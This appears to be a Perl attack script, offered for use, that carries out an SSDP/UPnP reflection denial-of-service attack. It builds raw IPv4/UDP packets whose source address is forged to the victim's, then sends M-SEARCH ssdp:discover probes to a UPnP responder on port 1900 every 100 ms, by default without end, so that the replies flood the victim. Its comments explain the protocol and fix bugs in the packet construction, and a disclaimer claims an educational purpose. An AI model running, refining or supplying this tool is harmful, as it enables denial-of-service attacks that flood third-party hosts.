UPNPD M-SEARCH ssdp:discover Reflection Denial Of Service

#!/usr/bin/perl
#
#  upnpd M-SEARCH ssdp:discover reflection 
#
#  Copyright 2015 (c) Todor Donev 
#  [email protected]
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  SSDP (Simple Service Discovery Protocol) is how UPnP
#  (Universal Plug and Play) devices announce and find each
#  other. It is an HTTP-like protocol carried over UDP port
#  1900 and uses the NOTIFY and M-SEARCH methods.
#
#  This script sends M-SEARCH probes whose IP source address
#  is forged to the victim's address, so the responder's reply
#  is delivered to the victim instead of to the sender. Forged
#  source addresses only leave networks that do not apply
#  egress (BCP 38) filtering.
#
#
#  Disclaimer:
#  This program is for educational purposes ONLY.
#  Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use at your own risk and educational 
#  purpose ONLY!
#
#  Wireshark: 
#  udp.port eq 1900 || frame contains "HTTP/1.1 200 OK"
#
#  See also:
#  SSDP Reflection DDoS Attacks 
#  http://tinyurl.com/mqwj6xt
#

use strict;
use warnings;
use Socket;
use Socket qw(IPPROTO_IP IPPROTO_RAW IP_HDRINCL);   # IPPROTO_* are not in Socket's default export list

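# Raw sockets need CAP_NET_RAW; the simple check is "real uid is root".
if ( $< != 0 ) {
   print "Sorry, must be run as root!\n";
   print "This script use RAW Socket.\n";
   exit;
}

print "[ upnpd M-SEARCH ssdp:discover reflection ]\n";

# Check the argument count before resolving anything, so a missing
# argument prints usage instead of a resolver warning.
if (@ARGV < 2) {
    print "[ Usage:  $0 <upnpd> <victim>\n";
    print "[  <todor.donev\@gmail.com>   Todor Donev  ]\n";
    exit;
}

# Packed 4-byte addresses, read by iphdr() and send_packet().
# $ssdp   - the reflector: IP destination of the spoofed datagram
# $victim - written into the IP *source* field, so the reflector's
#           reply is delivered to it
my $ssdp   = (gethostbyname($ARGV[0]))[4];
my $victim = (gethostbyname($ARGV[1]))[4];
die "[ Cannot resolve upnpd host '$ARGV[0]'\n"  unless defined $ssdp;
die "[ Cannot resolve victim host '$ARGV[1]'\n" unless defined $victim;

print "[ Sending SSDP packets: $ARGV[0] -> $ARGV[1]\n";

# IPPROTO_RAW: we supply the complete IP header ourselves. Request
# IP_HDRINCL by name rather than by number - the numeric pair (0, 1)
# is IPPROTO_IP/IP_TOS on Linux, not IP_HDRINCL; it only worked because
# Linux implies IP_HDRINCL for IPPROTO_RAW sockets.
socket(RAW, PF_INET, SOCK_RAW, IPPROTO_RAW) or die "socket: $!";
setsockopt(RAW, IPPROTO_IP, IP_HDRINCL, 1)  or die "setsockopt: $!";
main();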

    # Main program
sub main {
    # Assemble one spoofed datagram in wire order - IP header, UDP
    # header, SSDP request - and hand it to send_packet(), which replays
    # it to the reflector in a loop.
    my $datagram = join '', iphdr(), udphdr(), payload();
    send_packet($datagram);
}

    # IP header (Layer 3)
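sub iphdr {
    # Build the 20-byte IPv4 header that precedes the UDP datagram.
    #
    # Optional argument: $data_len, the number of UDP payload bytes that
    # follow the 8-byte UDP header. When omitted it is taken from
    # payload(), so the default matches what main() actually sends.
    # Returns the packed header as a byte string.
    #
    # Source address is $victim (the forged origin the reflector replies
    # to); destination is $ssdp. Both are packed 4-byte addresses set at
    # file scope.
    my ($data_len) = @_;
    $data_len = length(payload()) unless defined $data_len;

    my $ip_ver        = 4;                    # version                       (4 bits)
    my $iphdr_len     = 5;                    # header length, 32-bit words   (4 bits) -> 20 bytes
    my $ip_tos        = 0;                    # DSCP/ECN                      (8 bits)
    my $ip_total_len  = 20 + 8 + $data_len;   # IP hdr + UDP hdr + data       (16 bits)
    my $ip_frag_id    = 0;                    # identification                (16 bits)
    my $ip_flags_frag = '0' x 16;             # flags (R DF MF) + fragment offset, as a bit string
    my $ip_ttl        = 255;                  # TTL                           (8 bits)
    my $ip_proto      = 17;                   # IPPROTO_UDP                   (8 bits)
    my $ip_checksum   = 0;                    # header checksum               (16 bits)

    # Checksum is left at 0: with IP_HDRINCL the Linux kernel computes it
    # (and rewrites the total length) before transmit. Other kernels may
    # not; a portable version would compute the one's-complement sum here.
    # TTL and protocol are packed with 'C' (unsigned byte) - the previous
    # 'h2' format hex-decoded the string "25", giving a TTL of 82.
    return pack(
        'H2 H2 n n B16 C C n a4 a4',
        $ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
        $ip_frag_id, $ip_flags_frag,
        $ip_ttl, $ip_proto, $ip_checksum,
        $victim, $ssdp,
    );
}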

    # UDP header (Layer 4)
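sub udphdr {
    # Build the 8-byte UDP header: 31337 -> 1900 (SSDP).
    #
    # Optional argument: $data_len, the number of payload bytes that
    # follow the header; defaults to length(payload()) so it matches what
    # main() sends. Returns the packed header as a byte string.
    my ($data_len) = @_;
    $data_len = length(payload()) unless defined $data_len;

    my $udp_src_port = 31337;           # source port            (16 bits)
    my $udp_dst_port = 1900;            # SSDP                   (16 bits)
    my $udp_len      = 8 + $data_len;   # header + data          (16 bits)
    # 0 means "no checksum", which IPv4 UDP permits (RFC 768). A real
    # checksum is a one's-complement sum over a pseudo-header, the UDP
    # header and the data - not an XOR of the header.
    my $udp_checksum = 0;

    return pack('n n n n', $udp_src_port, $udp_dst_port, $udp_len, $udp_checksum);
}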

    # SSDP HTTP like (Layer 7)
sub payload {
    # The SSDP M-SEARCH request that gets reflected. Only the ST and MAN
    # headers are sent: HOST and MX are left out, and so is the empty line
    # that normally terminates an HTTP-style message. Responders that
    # insist on the terminator may ignore the probe.
    # Returns the request as a byte string - exactly what goes on the wire.
    my @lines = (
        'M-SEARCH * HTTP/1.1',
        'ST:upnp:rootdevice',             # search for root devices only
        'MAN:"ssdp:discover"',
        # 'HOST:239.255.255.250:1900',    # multicast address, not sent
        # 'MX:3',                         # seconds to delay response, not sent
    );
    return join '', map { "$_\r\n" } @lines;
}

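sub send_packet {
    # Replay one prebuilt datagram to the reflector every 100 ms.
    #
    # Arguments: $packet, the complete IP+UDP+SSDP byte string from
    # main(); $count (optional), how many copies to send - undefined
    # means forever, which is the original behaviour.
    # Uses the RAW socket opened at file scope and the packed $ssdp
    # address. Dies on the first failed send().
    my ($packet, $count) = @_;

    # sin_port is not used by an IPPROTO_RAW socket; the destination comes
    # from sin_addr (and the IP header we supply). pack_sockaddr_in() also
    # gets the struct layout right on systems whose sockaddr differs from
    # the hand-packed 'Sna4x8' form.
    my $dest = pack_sockaddr_in(0, $ssdp);

    while (!defined $count || $count-- > 0) {
        select(undef, undef, undef, 0.10);   # 100 ms between datagrams
        send(RAW, $packet, 0, $dest) or die "send: $!";
    }
}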
